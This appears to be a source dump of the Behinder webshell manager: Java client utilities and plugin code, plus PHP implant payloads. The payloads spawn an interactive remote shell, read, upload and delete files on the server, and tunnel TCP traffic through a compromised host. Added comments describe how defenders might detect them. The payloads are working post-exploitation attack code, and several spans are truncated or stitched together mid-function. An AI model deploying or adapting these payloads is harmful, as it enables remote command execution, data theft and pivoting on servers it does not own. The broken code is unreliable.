1 | package net.rebeyond.behinder.utils;
2 |
3 | import java.io.*;
4 | import java.nio.charset.Charset;
5 | import java.util.Enumeration;
6 | import java.util.zip.ZipEntry;
7 | import java.util.zip.ZipFile;
8 | import java.util.zip.ZipOutputStream;
9 |
10 | public class ZipUtil {
11 | private static final int BUFFER_SIZE = 2048;
12 | private static final boolean KeepDirStructure = true;
13 |
14 | public ZipUtil() {
15 | }
16 |
17 | public static void main(String[] args) {
18 | try {
19 | unZipFiles("/Users/rebeyond/newScan.zip", "/Users/rebeyond/newScan");
20 | } catch (Exception var2) {
21 | var2.printStackTrace();
22 | }
23 |
24 | }
25 |
26 | public static void toZip(String srcDir, String outPathFile, boolean isDelSrcFile) throws Exception {
27 | long start = System.currentTimeMillis();
28 | FileOutputStream out = null;
29 | ZipOutputStream zos = null;
30 |
31 | try {
32 | out = new FileOutputStream(new File(outPathFile));
33 | zos = new ZipOutputStream(out);
34 | File sourceFile = new File(srcDir);
35 | if (!sourceFile.exists()) {
36 | throw new Exception("需压缩文件或者文件夹不存在");
37 | }
38 |
39 | compress(sourceFile, zos, sourceFile.getName());
40 | if (isDelSrcFile) {
41 | delDir(srcDir);
42 | }
43 | } catch (Exception var15) {
44 | throw new Exception("zip error from ZipUtils");
45 | } finally {
46 | try {
47 | if (zos != null) {
48 | zos.close();
49 | }
50 |
51 | if (out != null) {
52 | out.close();
53 | }
54 | } catch (Exception var14) {
55 | }
56 |
57 | }
58 |
59 | }
60 |
61 | private static void compress(File sourceFile, ZipOutputStream zos, String name) throws Exception {
62 | byte[] buf = new byte[2048];
63 | if (sourceFile.isFile()) {
64 | zos.putNextEntry(new ZipEntry(name));
65 | FileInputStream in = new FileInputStream(sourceFile);
66 |
67 | int len;
68 | while ((len = in.read(buf)) != -1) {
69 | zos.write(buf, 0, len);
70 | }
71 |
72 | zos.closeEntry();
73 | in.close();
74 | } else {
75 | File[] listFiles = sourceFile.listFiles();
76 | if (listFiles != null && listFiles.length != 0) {
77 | File[] var10 = listFiles;
78 | int var6 = listFiles.length;
79 |
80 | for (int var7 = 0; var7 < var6; ++var7) {
81 | File file = var10[var7];
82 | compress(file, zos, name + "/" + file.getName());
83 | }
84 | } else {
85 | zos.putNextEntry(new ZipEntry(name + "/"));
86 | zos.closeEntry();
87 | }
88 | }
89 |
90 | }
91 |
92 | public static void unZipFiles(String zipPath, String descDir) throws IOException {
93 | long var2 = System.currentTimeMillis();
94 |
95 | try {
96 | File zipFile = new File(zipPath);
97 | if (!zipFile.exists()) {
98 | throw new IOException("需解压文件不存在.");
99 | } else {
100 | File pathFile = new File(descDir);
101 | if (!pathFile.exists()) {
102 | pathFile.mkdirs();
103 | }
104 |
105 | ZipFile zip = new ZipFile(zipFile, Charset.forName("GBK"));
106 | Enumeration entries = zip.entries();
107 |
108 | while (true) {
109 | InputStream in;
110 | String outPath;
111 | do {
112 | if (!entries.hasMoreElements()) {
113 | return;
114 | }
115 |
116 | ZipEntry entry = (ZipEntry) entries.nextElement();
117 | String zipEntryName = entry.getName();
118 | in = zip.getInputStream(entry);
119 | outPath = (descDir + File.separator + zipEntryName).replaceAll("\\*", "/");
120 | File file = new File(outPath.substring(0, outPath.lastIndexOf(47)));
121 | if (!file.exists()) {
122 | file.mkdirs();
123 | }
124 | } while ((new File(outPath)).isDirectory());
125 |
126 | OutputStream out = new FileOutputStream(outPath);
127 | byte[] buf1 = new byte[1024];
128 |
129 | int len;
130 | while ((len = in.read(buf1)) > 0) {
131 | out.write(buf1, 0, len);
132 | }
133 |
134 | in.close();
135 | out.close();
136 | }
137 | }
138 | } catch (Exception var16) {
139 | throw new IOException(var16);
140 | }
141 | }
142 |
143 | public static void delDir(String dirPath) throws IOException {
144 | long var1 = System.currentTimeMillis();
145 |
146 | try {
147 | File dirFile = new File(dirPath);
148 | if (dirFile.exists()) {
149 | if (dirFile.isFile()) {
150 | dirFile.delete();
151 | } else {
152 | File[] files = dirFile.listFiles();
153 | if (files != null) {
154 | for (int i = 0; i < files.length; ++i) {
155 | delDir(files[i].toString());
156 | }
157 |
158 | dirFile.delete();
159 | }
160 | }
161 | }
162 | } catch (Exception var6) {
163 | throw new IOException("删除文件异常.");
164 | }
165 | }
166 | }
167 |
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/payload/php/RealCMD.php:
--------------------------------------------------------------------------------
1 |
2 | @error_reporting(0);
3 |
/**
 * Request dispatcher for an interactive shell session that is kept alive by
 * create() and driven through the PHP session.
 *
 *   create - start the shell process (blocks inside create() until it stops)
 *   read   - return and clear the output buffered in $_SESSION["readBuffer"]
 *   write  - base64-decode $cmd and place it in $_SESSION["writeBuffer"]
 *   stop   - clear $_SESSION["run"] so the loop in create() exits
 *
 * Defender view: the reply is JSON whose "status" and "msg" values are
 * base64-encoded and which is then passed through encrypt() with the session
 * value 'k'. Response bodies therefore carry no plaintext command output, and
 * inspection has to rely on host telemetry (process tree, session store)
 * rather than HTTP content matching.
 *
 * @param string $type     create | read | write | stop
 * @param string $bashPath Shell executable to start (create only).
 * @param string $cmd      Base64 input for the shell (write only).
 */
function main($type, $bashPath = "", $cmd = "")
{
    $result = array();
    if ($type == "create") {
        create($bashPath);
        $result["status"] = "success";
    } else if ($type == "read") {
        // Checked before session_start() is called in this branch.
        if (isset($_SESSION["readBuffer"]))
        {
            @session_start();
            $readContent = $_SESSION["readBuffer"];
            // Drops exactly what was just read, leaving the buffer empty.
            $_SESSION["readBuffer"] = substr($_SESSION["readBuffer"], strlen($readContent));
            session_write_close();
            $result["status"] = "success";
            $result["msg"] = $readContent;
        }
        else
        {
            $result["status"] = "fail";
            $result["msg"] = "Virtual Terminal fail to start or timeout";
        }

    } else if ($type == "write") {
        $cmd = base64_decode($cmd);
        @session_start();
        $_SESSION["writeBuffer"] = $cmd;
        session_write_close();
        $result["status"] = "success";
    }
    else if ($type == "stop") {
        @session_start();
        $_SESSION["run"] = false;
        session_write_close();
        $result["msg"] = "stopped";
        $result["status"] = "success";
    }
    $result["status"] = base64_encode($result["status"]);
    $result["msg"] = base64_encode($result["msg"]);
    // encrypt() is declared later in this file; its body is not legible in this listing.
    echo encrypt(json_encode($result),$_SESSION['k']);
}
44 |
/**
 * Normalises a byte string to UTF-8. Input that survives a UTF-8 -> GBK -> UTF-8
 * round trip unchanged is returned as-is; anything else is treated as GBK and
 * converted to UTF-8. Unconvertible bytes are dropped (//IGNORE).
 *
 * @param string $str Bytes in either UTF-8 or GBK.
 * @return string UTF-8 text.
 */
function getSafeStr($str){
    $roundTrip = iconv('gbk', 'utf-8//IGNORE', iconv('utf-8', 'gbk//IGNORE', $str));
    if ($roundTrip != $str) {
        // The round trip changed the input, so it was not valid UTF-8; reinterpret it as GBK.
        return iconv('gbk', 'utf-8//IGNORE', $str);
    }
    return $roundTrip;
}
54 |
/**
 * Starts $bashPath as a child process and relays its input and output through
 * the PHP session until $_SESSION["run"] is cleared or the idle counter runs
 * out. Input is taken from $_SESSION["writeBuffer"]; stdout and stderr are
 * appended to $_SESSION["readBuffer"].
 *
 * Defender view:
 *  - Process tree: the PHP worker spawns the shell. On non-Windows hosts the
 *    shell is then told to run `python -c 'import pty; pty.spawn(...)'`, so a
 *    python child with that command line under a web worker is a strong signal.
 *  - On Windows the child's stdout and stderr go to two files named
 *    <rand()>.txt in the system temp directory, which are repeatedly truncated
 *    and removed at the end.
 *  - The session store is rewritten on every iteration with the keys "run",
 *    "readBuffer" and "writeBuffer".
 *  - The request does not return while the loop runs (time limit removed).
 *
 * @param string $bashPath Command line handed to proc_open().
 */
function create($bashPath)
{
    set_time_limit(0);
    @session_start();
    $_SESSION["readBuffer"] = "";
    session_write_close();
    $win = (FALSE !== strpos(strtolower(PHP_OS), 'win'));
    if ($win) {
        // Windows: output is captured through temp files instead of pipes.
        $outputfile = sys_get_temp_dir() . DIRECTORY_SEPARATOR . rand() . ".txt";
        $errorfile = sys_get_temp_dir() . DIRECTORY_SEPARATOR . rand() . ".txt";
    }
    $descriptorspec = array(
        0 => array(
            "pipe",
            "r"
        ),
        1 => array(
            "pipe",
            "w"
        ),
        2 => array(
            "pipe",
            "w"
        )
    );
    if ($win) {
        $descriptorspec[1] = array(
            "file",
            $outputfile,
            "a"
        );
        $descriptorspec[2] = array(
            "file",
            $errorfile,
            "a"
        );
    }
    $process = proc_open($bashPath, $descriptorspec, $pipes);

    if (! is_resource($process)) {
        exit(1);
    }

    // stdin of the child is non-blocking on every platform.
    stream_set_blocking($pipes[0], 0);

    if ($win) {
        $reader = fopen($outputfile, "r+");
        $error = fopen($errorfile, "r+");
    } else {
        stream_set_blocking($pipes[1], 0);
        stream_set_blocking($pipes[2], 0);
        $reader = $pipes[1];
        $error = $pipes[2];
    }

    @session_start();
    $_SESSION["run"] = true;
    session_write_close();
    /*
    ob_end_clean();
    header("Connection: close");
    ignore_user_abort();
    ob_start();
    echo str_pad('',129);
    $size = ob_get_length();
    header("Content-Length: $size");
    ob_flush();
    ob_end_flush();
    flush();
    */
    if (! $win) {
        // Asks the freshly started shell to re-spawn $bashPath under a pseudo-terminal via Python.
        fwrite($pipes[0], sprintf("python -c 'import pty; pty.spawn(\"%s\")'\n", $bashPath));
        fflush($pipes[0]);
    }

    sleep(1);
    $idle=0;
    // Relay loop: ends when "run" is cleared or after 1000000 consecutive iterations without input.
    while ($_SESSION["run"] and $idle<1000000) {
        @session_start();
        @$writeBuffer = $_SESSION["writeBuffer"];
        session_write_close();
        if (strlen($writeBuffer) > 0) {
            // Pending input: forward it to the child's stdin and clear the buffer.
            fwrite($pipes[0], $writeBuffer);
            fflush($pipes[0]);

            session_start();
            $_SESSION["writeBuffer"] = "";
            session_write_close();
            $idle=0;
        }
        else
        {
            $idle=$idle+1;
        }
        // Drain stdout, normalise it to UTF-8 and append it to the session read buffer.
        while (($output = fread($reader, 10240)) != false) {
            /* if ($win)
            {
            fseek($reader, strlen($output));
            }*/
            if (!function_exists("mb_convert_encoding"))
            {
                $output=getSafeStr($output);
            }
            else
            {
                $output=mb_convert_encoding($output, 'UTF-8', mb_detect_encoding($output, "UTF-8,GBK"));
            }
            @session_start();
            $_SESSION["readBuffer"] = $_SESSION["readBuffer"] . $output;
            session_write_close();
        }
        if ($win)
            ftruncate($reader, 0);
        // Same for stderr; a newline is also queued as input whenever stderr produced data.
        while (($errput = fread($error, 10240)) != false) {

            /*if ($win)
            {
            fseek($error, strlen($errput));
            }*/

            if (!function_exists("mb_convert_encoding"))
            {
                $errput=getSafeStr($errput);
            }
            else
            {
                $errput=mb_convert_encoding($errput, 'UTF-8', mb_detect_encoding($errput, "UTF-8,GBK"));
            }
            @session_start();
            $_SESSION["writeBuffer"]="\n";
            $_SESSION["readBuffer"] = $_SESSION["readBuffer"] . $errput;
            session_write_close();
        }
        if ($win)
            ftruncate($error, 0);
        // NOTE(review): sleep() takes whole seconds, so 0.8 presumably truncates to 0 and the
        // loop polls without pause; expect sustained CPU and session-store writes while it runs.
        sleep(0.8);
    }
    fclose($reader);
    fclose($error);
    unset($_SESSION["readBuffer"]);
    if ($win)
    {
        // Removes the two temp capture files; they exist only for the lifetime of the loop.
        unlink($outputfile);
        unlink($errorfile);
    }

}
202 |
203 | function encrypt($data,$key)
204 | {
205 | if(!extension_loaded('openssl'))
206 | {
207 | for($i=0;$i base64_encode($fileName),
57 | "size" => base64_encode(filesize($fullPath)),
58 | "lastModified" => base64_encode(date("Y-m-d H:i:s", filemtime($fullPath)))
59 | );
60 | $obj["perm"] = is_readable($fullPath) . "," . is_writable($fullPath) . "," . is_executable($fullPath);
61 | if (is_file($fullPath)) {
62 | $obj["type"] = base64_encode("file");
63 | } else {
64 | $obj["type"] = base64_encode("directory");
65 | }
66 | array_push($objArr, $obj);
67 | }
68 | $result["status"] = base64_encode("success");
69 | $result["msg"] = base64_encode(json_encode($objArr));
70 | echo encrypt(json_encode($result), $_SESSION['k']);
71 | break;
72 | case "show":
73 | $contents = file_get_contents($path);
74 | $result["status"] = base64_encode("success");
75 | if (function_exists("mb_convert_encoding"))
76 | {
77 | if ($charset=="")
78 | {
79 | $charset = mb_detect_encoding($contents, array(
80 | 'GB2312',
81 | 'GBK',
82 | 'UTF-16',
83 | 'UCS-2',
84 | 'UTF-8',
85 | 'BIG5',
86 | 'ASCII'
87 | ));
88 | }
89 | $result["msg"] = base64_encode(mb_convert_encoding($contents, "UTF-8", $charset));
90 | }
91 | else
92 | {
93 | if ($charset=="")
94 | {
95 | $result["msg"] = base64_encode(getSafeStr($contents));
96 | }
97 | else
98 | {
99 | $result["msg"] = base64_encode(iconv($charset, 'utf-8//IGNORE', $contents));
100 | }
101 |
102 | }
103 | $result = encrypt(json_encode($result),$_SESSION['k']);
104 | echo $result;
105 | break;
106 | case "download":
107 | if (! file_exists($path)) {
108 | header('HTTP/1.1 404 NOT FOUND');
109 | } else {
110 | $file = fopen($path, "rb");
111 | echo fread($file, filesize($path));
112 | fclose($file);
113 | }
114 | break;
115 | case "delete":
116 | if (is_file($path)) {
117 | if (unlink($path)) {
118 | $result["status"] = base64_encode("success");
119 | $result["msg"] = base64_encode($path . "删除成功");
120 | } else {
121 | $result["status"] = base64_encode("fail");
122 | $result["msg"] = base64_encode($path . "删除失败");
123 | }
124 | }
125 | if (is_dir($path)) {
126 | delDir($path);
127 | $result["status"] = base64_encode("success");
128 | $result["msg"] = base64_encode($path."删除成功");
129 | }
130 | echo encrypt(json_encode($result),$_SESSION['k']);
131 | break;
132 | case "create":
133 | $file = fopen($path, "w");
134 | $content = base64_decode($content);
135 | fwrite($file, $content);
136 | fflush($file);
137 | fclose($file);
138 | if (file_exists($path) && filesize($path) == strlen($content)) {
139 | $result["status"] = base64_encode("success");
140 | $result["msg"] = base64_encode($path . "上传完成,远程文件大小:" . $path . filesize($path));
141 | } else {
142 | $result["status"] = base64_encode("fail");
143 | $result["msg"] = base64_encode($path . "上传失败");
144 | }
145 | echo encrypt(json_encode($result), $_SESSION['k']);
146 | break;
147 | case "append":
148 | $file = fopen($path, "a+");
149 | $content = base64_decode($content);
150 | fwrite($file, $content);
151 | fclose($file);
152 | $result["status"] = base64_encode("success");
153 | $result["msg"] = base64_encode($path . "追加完成,远程文件大小:" . $path . filesize($path));
154 | echo encrypt(json_encode($result),$_SESSION['k']);
155 | break;
156 | case "rename":
157 | if (rename($path,$newpath)) {
158 | $result["status"] = base64_encode("success");
159 | $result["msg"] = base64_encode("重命名完成:" . $newpath);
160 | } else {
161 | $result["status"] = base64_encode("fail");
162 | $result["msg"] = base64_encode($path . "重命名失败");
163 | }
164 | echo encrypt(json_encode($result), $_SESSION['k']);
165 | break;
166 | default:
167 | break;
168 | }
169 | }
170 |
171 | function encrypt($data,$key)
172 | {
173 | if(!extension_loaded('openssl'))
174 | {
175 | for($i=0;$i {
50 | try {
51 | JSONObject resultObj = this.currentShellService.submitPluginTask(pluginName, payloadPath, params);
52 | String status = resultObj.getString("status");
53 | String msg = resultObj.getString("msg");
54 | Platform.runLater(() -> {
55 | this.statusLabel.setText(msg);
56 | });
57 | } catch (Exception var7) {
58 | var7.printStackTrace();
59 | Platform.runLater(() -> {
60 | this.statusLabel.setText("插件运行失败");
61 | });
62 | }
63 |
64 | };
65 | Thread workThread = new Thread(runner);
66 | this.workList.add(workThread);
67 | workThread.start();
68 | }
69 |
/**
 * Submits a plugin task on a new worker thread and reports the outcome through
 * {@code callBack} instead of touching the UI.
 *
 * The shell entity's "type" field selects the payload file, with "jsp" mapped to
 * "java". {@code params} is mutated: "taskID" is set to {@code pluginName} before
 * the task is handed to the shell service.
 *
 * NOTE(review): the payload location is a fixed absolute path baked into the
 * format string below; it is not derived from any configuration visible here.
 *
 * @param pluginName plugin identifier; also used as the task id and as a path component
 * @param params     task parameters forwarded to the shell service (raw Map, modified in place)
 * @param callBack   receives (status, msg) on success, or ("fail", exception message) on error
 * @throws Exception declared by the signature; the submission itself runs on the worker thread
 */
public void sendTaskBackground(String pluginName, Map params, PluginSubmitCallBack callBack) throws Exception {
    String shellType = this.shellEntity.getString("type");
    String payloadType = shellType.equals("jsp") ? "java" : shellType;
    String payloadPath = String.format("/Users/rebeyond/Documents/Behinder/plugin/%s/payload/%s.payload", pluginName, payloadType);
    params.put("taskID", pluginName);

    Thread workThread = new Thread(() -> {
        try {
            JSONObject reply = this.currentShellService.submitPluginTask(pluginName, payloadPath, params);
            // The callback sits inside the try: if it throws, the catch below reports "fail" as well.
            callBack.onPluginSubmit(reply.getString("status"), reply.getString("msg"));
        } catch (Exception submitError) {
            submitError.printStackTrace();
            callBack.onPluginSubmit("fail", submitError.getMessage());
        }
    });
    // The thread is recorded in workList before it is started.
    this.workList.add(workThread);
    workThread.start();
}
94 |
/**
 * Stub: no task list is queried; the method always returns the empty string.
 *
 * @return ""
 */
public String queryTaskList() {
    return "";
}
99 |
/**
 * Stub: {@code taskName} is ignored and the method always returns the empty string.
 *
 * @param taskName unused
 * @return ""
 */
public String queryTask(String taskName) {
    return "";
}
104 |
/**
 * Fetches the latest result of a plugin task on a worker thread and pushes it
 * into the plugin WebView by calling its {@code onResult(status, result, running)}
 * script function on the JavaFX thread.
 *
 * The reply's "msg" field is parsed as JSON; its "result" field is Base64-decoded
 * as UTF-8 and its "running" field is passed through unchanged.
 *
 * NOTE(review): status, the decoded result and the running flag all come from the
 * remote reply and are interpolated into the script text with plain '%s' and no
 * escaping, so a quote or backslash in them changes the script that is executed.
 * Any exception from executeScript is caught and only shown in the status label.
 *
 * @param pluginName name of the plugin whose task result is requested
 */
public void getTaskResult(String pluginName) {
    this.statusLabel.setText("正在刷新任务执行结果……");

    Thread workThread = new Thread(() -> {
        try {
            JSONObject reply = this.currentShellService.getPluginTaskResult(pluginName);
            String status = reply.getString("status");
            JSONObject body = new JSONObject(reply.getString("msg"));
            byte[] rawResult = Base64.getDecoder().decode(body.getString("result"));
            String pluginResult = new String(rawResult, StandardCharsets.UTF_8);
            String pluginRunning = body.getString("running");

            Platform.runLater(() -> {
                if (!status.equals("success")) {
                    this.statusLabel.setText("结果刷新失败");
                    return;
                }

                this.statusLabel.setText("结果刷新成功");
                try {
                    String call = String.format("onResult('%s','%s','%s')", status, pluginResult, pluginRunning);
                    this.pluginWebview.getEngine().executeScript(call);
                } catch (Exception scriptError) {
                    this.statusLabel.setText("结果刷新成功,但是插件解析结果失败,请检查插件:" + scriptError.getMessage());
                }
            });
        } catch (Exception fetchError) {
            // Transport, JSON or Base64 failures all end up here.
            fetchError.printStackTrace();
            Platform.runLater(() -> {
                this.statusLabel.setText("结果刷新失败:" + fetchError.getMessage());
            });
        }
    });
    this.workList.add(workThread);
    workThread.start();
}
141 |
/**
 * Polls the result of a plugin task on a worker thread and forwards every reply
 * to {@code callBack}.
 *
 * Each round requests the task result, Base64-decodes the "result" field of the
 * JSON carried in "msg", invokes the callback and then sleeps for 3000 ms.
 * Polling repeats while the reply's "running" field equals "true"; any exception
 * ends the loop and is reported once as ("fail", message, "false").
 *
 * @param pluginName name of the plugin whose task result is polled
 * @param callBack   receives (status, decoded result, running flag) for every reply
 */
public void getTaskResultBackground(String pluginName, PluginResultCallBack callBack) {
    Thread workThread = new Thread(() -> {
        try {
            String running;
            do {
                JSONObject reply = this.currentShellService.getPluginTaskResult(pluginName);
                String status = reply.getString("status");
                JSONObject body = new JSONObject(reply.getString("msg"));
                byte[] rawResult = Base64.getDecoder().decode(body.getString("result"));
                String pluginResult = new String(rawResult, StandardCharsets.UTF_8);
                running = body.getString("running");
                callBack.onPluginResult(status, pluginResult, running);
                // The pause happens after every reply, including the final one.
                Thread.sleep(3000L);
            } while (running.equals("true"));
        } catch (Exception pollError) {
            callBack.onPluginResult("fail", pollError.getMessage(), "false");
        }
    });
    this.workList.add(workThread);
    workThread.start();
}
167 | }
168 |
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/ui/ParallelViewTab.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/ui/ParallelViewTab.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/src/main/java/net/rebeyond/behinder/ui/PluginViewTab.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/ui/PluginViewTab.fxml:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/src/main/resources/net/rebeyond/behinder/payload/php/PortMap.php.bak:
--------------------------------------------------------------------------------
// Error reporting is switched off (and the call itself silenced with @) before anything else runs.
1 | @error_reporting(0);
/**
 * Port-mapping payload: relays TCP traffic through the PHP process, dispatching on $action.
 *
 *   createRemote - connects to $targetIP:$targetPort and to $remoteIP:$remotePort and
 *                  copies bytes between the two sockets in an endless loop.
 *   createLocal  - connects to $targetIP:$targetPort, ends the HTTP response, then keeps
 *                  looping: bytes queued in $_SESSION["writebuf"] go to the socket, bytes
 *                  read from the socket are appended to $_SESSION["readbuf"].
 *   read         - returns and clears $_SESSION["readbuf"].
 *   write        - base64-decodes $extraData and appends it to $_SESSION["writebuf"].
 *   closeLocal   - sets $_SESSION["local_running"] to false.
 *
 * Traits visible in this listing that are useful when triaging a host or a capture:
 *   - every error string is prefixed with the four bytes \x37\x21\x49\x36 ("7!I6");
 *   - the session holds the keys "local_running", "writebuf" and "readbuf";
 *   - createRemote and createLocal keep the request's PHP worker busy in a loop with no delay.
 *
 * $socketHash is accepted but not referenced anywhere in the body shown here.
 */
2 | function main($action,$targetIP="",$targetPort="",$socketHash="",$remoteIP="",$remotePort="",$extraData="")
3 | {
4 | switch($action)
5 | {
6 | case "createRemote":
// First leg: outbound TCP connection to the target host.
7 | $localSocket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
8 | if ($localSocket === false) {
9 | echo "\x37\x21\x49\x36Failed creating socket";
10 | return;
11 | }
12 | $res = @socket_connect($localSocket, $targetIP, $targetPort);
13 | if ($res === false) {
14 | echo "\x37\x21\x49\x36Failed connecting to target";
15 | return;
16 | }
17 | socket_set_nonblock($localSocket);
18 | @session_start();
19 | $localPort = 0;
// $failReason is assigned on failure but never echoed or returned in the code shown.
20 | if (socket_getsockname($localSocket, $sourceIp, $localPort) === false) {
21 | $failReason = "socket_getsockname() failed: reason: " . socket_strerror(socket_last_error());
22 | }
// NOTE(review): targetIP / targetPort are written without the $ sigil here, so this
// expression does not read the function parameters.
23 | $localKey = "remote_local_" . $localPort . "_" . targetIP . "_" . targetPort;
24 | $_SESSION[$localKey] = $localSocket;
// Second leg: outbound TCP connection to the remote endpoint.
25 | $remoteSocket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
26 | if ($remoteSocket === false) {
27 | echo "\x37\x21\x49\x36Failed creating socket";
28 | return;
29 | }
30 | $res = @socket_connect($remoteSocket, $remoteIP, $remotePort);
31 | if ($res === false) {
32 | echo "\x37\x21\x49\x36Failed connecting to remoteSocket";
33 | return;
34 | }
35 | socket_set_nonblock($remoteSocket);
36 | $localPort = 0;
37 | if (socket_getsockname($remoteSocket, $sourceIp, $localPort) === false) {
38 | $failReason = "socket_getsockname() failed: reason: " . socket_strerror(socket_last_error());
39 | }
// Same missing-$ pattern as for $localKey above.
40 | $remoteKey = "remote_remote_" . $localPort . "_" . targetIP . "_" . targetPort;
41 | $_SESSION[$remoteKey] = $remoteSocket;
// Relay loop: up to 10240 bytes per read in each direction. Both sockets are
// non-blocking and every failure branch is empty, so the loop has no exit and
// no delay; the "break" after it is never reached.
42 | while (true) {
43 | $localReadBuf = socket_read($localSocket, 10240);
44 | if ($localReadBuf === false) {
45 | //echo "\x37\x21\x49\x36Failed reading from localSocket";
46 |
47 |
48 | } else {
49 | $numOfRead = socket_write($remoteSocket, $localReadBuf, strlen($localReadBuf));
50 | if ($numOfRead === false) {
51 |
52 | }
53 | };
54 | $localWriteBuf = socket_read($remoteSocket, 10240);
55 | if ($localWriteBuf === false) {
56 |
57 | } else {
58 | $numOfWrite = socket_write($localSocket, $localWriteBuf, strlen($localWriteBuf));
59 | if ($numOfWrite === false) {
60 |
61 | }
62 | }
63 | }
64 | break;
65 | case "createLocal":
66 | $localSocket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
67 | if ($localSocket === false) {
68 | echo "\x37\x21\x49\x36Failed creating socket";
69 | return;
70 | }
71 | $res = @socket_connect($localSocket, $targetIP, $targetPort);
72 | if ($res === false) {
73 | echo "\x37\x21\x49\x36Failed connecting to target".$targetIP.":".$targetPort;
74 | return;
75 | }
76 | socket_set_nonblock($localSocket);
// Session state shared with the later "read" / "write" / "closeLocal" requests.
77 | @session_start();
78 | $_SESSION["local_running"] = true;
79 | $_SESSION["writebuf"] = "";
80 | $_SESSION["readbuf"] = "";
// Finish the HTTP response now: drop buffered output, send "Connection: close" and a
// Content-Length taken from a freshly started buffer, then flush. The loop below
// runs after that, inside the same request.
81 | ob_end_clean();
82 | header("Connection: close");
83 | ignore_user_abort();
84 | ob_start();
85 | $size = ob_get_length();
86 | header("Content-Length: $size");
87 | ob_end_flush();
88 | flush();
89 | session_write_close();
90 |
// Pump loop: the session is reopened and closed around each access, so other
// requests of the same session can run in between. There is no delay per
// iteration (the sleep at the bottom is commented out).
91 | while ($_SESSION["local_running"])
92 | {
93 | $readBuff = "";
94 | @session_start();
95 | $writeBuff = $_SESSION["writebuf"];
96 | $_SESSION["writebuf"] = "";
97 | session_write_close();
98 | if ($writeBuff != "")
99 | {
100 | $i = socket_write($localSocket, $writeBuff, strlen($writeBuff));
101 | if($i === false)
102 | {
// NOTE(review): this sets the key "run", not the "local_running" flag the loop tests.
103 | @session_start();
104 | $_SESSION["run"] = false;
105 | session_write_close();
106 | echo "\x37\x21\x49\x36Failed writing socket";
107 | }
108 | }
// Drain the socket in 512-byte reads. The body only runs when $o is truthy,
// so the "$o === false" branch inside it cannot be taken.
109 | while ($o = socket_read($localSocket, 512)) {
110 | if($o === false)
111 | {
112 | @session_start();
113 | $_SESSION["local_running"] = false;
114 | session_write_close();
115 | echo "\x37\x21\x49\x36Failed reading from socket";
116 | }
117 | $readBuff .= $o;
118 | }
119 | if ($readBuff!=""){
120 | @session_start();
121 | $_SESSION["readbuf"] .= $readBuff;
122 | session_write_close();
123 | }
124 | #sleep(0.2);
125 | }
126 | socket_close($localSocket);
127 | break;
128 | case "read":
// Hand back whatever the pump loop has collected and clear the buffer.
129 | @session_start();
130 | $readBuffer = $_SESSION["readbuf"];
131 | $_SESSION["readbuf"]="";
132 | $running = $_SESSION["local_running"];
133 | session_write_close();
134 | if ($running) {
135 | header("Connection: Keep-Alive");
136 | echo $readBuffer;
137 | return;
138 | } else {
139 | echo "\x37\x21\x49\x36RemoteSocket read filed";
140 | return;
141 | }
142 | break;
143 | case "write":
144 | {
145 | @session_start();
146 | $running = $_SESSION["local_running"];
147 | session_write_close();
148 | if(!$running){
149 | echo "\x37\x21\x49\x36No more running, close now";
150 | return;
151 | }
152 | header('Content-Type: application/octet-stream');
// $extraData arrives base64-encoded; the decoded bytes are queued for the pump loop.
// An empty or undecodable value falls through to the error branch.
153 | $rawPostData = base64_decode($extraData);
154 | if ($rawPostData) {
155 | @session_start();
156 | $_SESSION["writebuf"] .= $rawPostData;
157 | session_write_close();
158 | header("Connection: Keep-Alive");
159 | return;
160 | } else {
161 | echo "\x37\x21\x49\x36POST request read filed";
162 | }
163 | }
164 | break;
165 | case "closeLocal":
// Clears the flag the createLocal loop tests on each iteration.
166 | @session_start();
167 | $running = $_SESSION["local_running"]=false;
168 | break;
169 | }
170 |
171 | }
--------------------------------------------------------------------------------